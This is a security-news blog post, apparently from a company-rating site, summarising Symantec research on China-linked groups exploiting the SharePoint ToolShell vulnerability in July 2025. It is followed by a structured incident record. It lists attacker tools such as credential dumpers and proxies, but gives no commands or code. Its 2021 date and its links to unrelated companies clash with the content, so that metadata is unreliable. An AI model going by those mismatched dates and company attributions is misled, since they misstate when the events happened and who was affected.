• Home
  • cyber
  • European Finance Company and Middle Eastern Government Department: China-linked hackers exploit ToolShell to hit telecom, government networks globally
cyber Cyber Attack

European Finance Company and Middle Eastern Government Department: China-linked hackers exploit ToolShell to hit telecom, government networks globally

Jun 16, 2021 3 min read
European Finance Company and Middle Eastern Government Department: China-linked hackers exploit ToolShell to hit telecom, government networks globally

Chinese Threat Actors Exploit Zero-Day ToolShell Vulnerability in Global Cyber Espionage Campaign

New research from Symantec reveals that China-linked threat actors exploited the recently patched ToolShell vulnerability (CVE-2025-53770) to breach a telecommunications company in the Middle East and government agencies across Africa and South America in July 2025. The attacks, which began just days after Microsoft released patches, highlight the rapid weaponization of zero-day flaws by state-backed cyber operatives.

The campaign involved the deployment of Zingdoor, a Go-based HTTP backdoor previously attributed to the Chinese group Glowworm (Earth Estries/FamousSparrow), and KrustyLoader, a Rust-written malware linked to UNC5221, another China-nexus actor. Additional victims included a state technology agency in Africa, a Middle Eastern government department, and a European finance company. Attackers also leveraged ShadowPad, a modular Trojan, and the Sliver command-and-control framework, often abused for post-exploitation activities.

ToolShell, a critical flaw in on-premise SharePoint servers, allowed unauthenticated remote code execution and full system access. Microsoft confirmed that at least three Chinese groups Budworm (Linen Typhoon), Sheathminer (Violet Typhoon), and Storm-2603 exploited the vulnerability, with Storm-2603 deploying Warlock ransomware in some attacks. A related path traversal bug (CVE-2025-53771) was patched simultaneously.

The attackers used a mix of living-off-the-land binaries (LOLBins) and publicly available tools, including:

  • Certutil (file download/decode)
  • GoGo Scanner (automated network scanning)
  • Revsocks (SOCKS5 proxy for firewall evasion)
  • Procdump/Minidump/LsassDumper (credential harvesting)
  • PetitPotam (CVE-2021-36942) (LSA spoofing for lateral movement)

Symantec’s investigation found that malicious activity in the Middle Eastern telecom firm began on July 21, 2025, with attackers sideloading Zingdoor via a legitimate Trend Micro binary and later deploying KrustyLoader on July 25. The campaign’s scale suggests mass scanning for vulnerable systems, followed by targeted intrusions for espionage and persistent access.

While overlaps exist with Glowworm’s past operations, Symantec could not conclusively attribute the attacks to a single group, though all evidence points to China-based actors. The incidents underscore the global reach of state-sponsored cyber threats and the urgency of patching critical vulnerabilities even as attackers exploit them within days of disclosure.

Source: https://industrialcyber.co/ransomware/china-linked-hackers-exploit-toolshell-to-hit-telecom-government-networks-globally/

ETIS - The Community of Telecom Professionals cybersecurity rating report: https://www.rankiteo.com/company/etis-driving-collaboration-within-the-european-telecom-industry

Kaspersky Middle East cybersecurity rating report: https://www.rankiteo.com/company/kaspersky-lab-middle-east

"id": "ETIKAS1769561687",
"linkid": "etis-driving-collaboration-within-the-european-telecom-industry, kaspersky-lab-middle-east",
"type": "Cyber Attack",
"date": "6/2021",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': 'Telecommunications',
                        'location': 'Middle East',
                        'name': 'Middle Eastern telecommunications company',
                        'type': 'Telecommunications'},
                       {'industry': 'Government',
                        'location': 'Africa',
                        'name': 'State technology agency in Africa',
                        'type': 'Government Agency'},
                       {'industry': 'Government',
                        'location': 'Middle East',
                        'name': 'Middle Eastern government department',
                        'type': 'Government Agency'},
                       {'industry': 'Finance',
                        'location': 'Europe',
                        'name': 'European finance company',
                        'type': 'Financial Institution'}],
 'attack_vector': 'Zero-day vulnerability (CVE-2025-53770) in on-premise '
                  'SharePoint servers',
 'data_breach': {'data_encryption': True,
                 'data_exfiltration': True,
                 'personally_identifiable_information': True,
                 'sensitivity_of_data': 'High',
                 'type_of_data_compromised': ['Credentials',
                                              'Sensitive government data',
                                              'Financial data']},
 'date_detected': '2025-07-21',
 'description': 'New research from Symantec reveals that China-linked threat '
                'actors exploited the recently patched ToolShell vulnerability '
                '(CVE-2025-53770) to breach a telecommunications company in '
                'the Middle East and government agencies across Africa and '
                'South America in July 2025. The attacks involved the '
                'deployment of Zingdoor, KrustyLoader, ShadowPad, and Sliver, '
                'with additional exploitation of a related path traversal bug '
                '(CVE-2025-53771). The campaign highlights the rapid '
                'weaponization of zero-day flaws by state-backed cyber '
                'operatives.',
 'impact': {'data_compromised': True,
            'identity_theft_risk': True,
            'operational_impact': 'Persistent access and lateral movement '
                                  'within compromised networks',
            'systems_affected': ['SharePoint servers',
                                 'Government systems',
                                 'Telecommunications infrastructure',
                                 'Financial systems']},
 'initial_access_broker': {'backdoors_established': ['Zingdoor',
                                                     'KrustyLoader',
                                                     'ShadowPad'],
                           'entry_point': 'ToolShell vulnerability '
                                          '(CVE-2025-53770)',
                           'high_value_targets': ['Government agencies',
                                                  'Telecommunications',
                                                  'Financial institutions']},
 'investigation_status': 'Ongoing',
 'lessons_learned': 'The rapid exploitation of zero-day vulnerabilities by '
                    'state-backed actors underscores the need for immediate '
                    'patching and proactive threat hunting.',
 'motivation': ['Espionage',
                'Persistent Access',
                'Financial Gain (Ransomware)'],
 'post_incident_analysis': {'corrective_actions': ['Patch management '
                                                   'prioritization for '
                                                   'critical vulnerabilities.',
                                                   'Enhanced detection for '
                                                   'LOLBin abuse and '
                                                   'post-exploitation '
                                                   'frameworks.',
                                                   'Improved network '
                                                   'segmentation and access '
                                                   'controls.'],
                            'root_causes': ['Unpatched zero-day vulnerability '
                                            '(CVE-2025-53770)',
                                            'Use of LOLBins for evasion and '
                                            'lateral movement']},
 'ransomware': {'data_encryption': True,
                'data_exfiltration': True,
                'ransomware_strain': 'Warlock'},
 'recommendations': ['Immediately patch critical vulnerabilities like '
                     'CVE-2025-53770 and CVE-2025-53771.',
                     'Monitor for unusual activity involving LOLBins and '
                     'publicly available tools like Sliver and Revsocks.',
                     'Implement network segmentation to limit lateral '
                     'movement.',
                     'Enhance monitoring for credential harvesting and data '
                     'exfiltration.'],
 'references': [{'source': 'Symantec'}, {'source': 'Microsoft'}],
 'response': {'third_party_assistance': 'Symantec'},
 'threat_actor': ['Glowworm (Earth Estries/FamousSparrow)',
                  'UNC5221',
                  'Budworm (Linen Typhoon)',
                  'Sheathminer (Violet Typhoon)',
                  'Storm-2603'],
 'title': 'Chinese Threat Actors Exploit Zero-Day ToolShell Vulnerability in '
          'Global Cyber Espionage Campaign',
 'type': ['Cyber Espionage', 'Ransomware'],
 'vulnerability_exploited': ['CVE-2025-53770 (ToolShell)',
                             'CVE-2025-53771 (Path Traversal)',
                             'CVE-2021-36942 (PetitPotam)']}
Published by
Jeremy C
Jeremy C
You might also like
Great! Next, complete checkout for full access to Rankiteo Blog.
Welcome back! You've successfully signed in.
You've successfully subscribed to Rankiteo Blog.
Success! Your account is fully activated, you now have access to all content.
Success! Your billing info has been updated.
Your billing was not updated.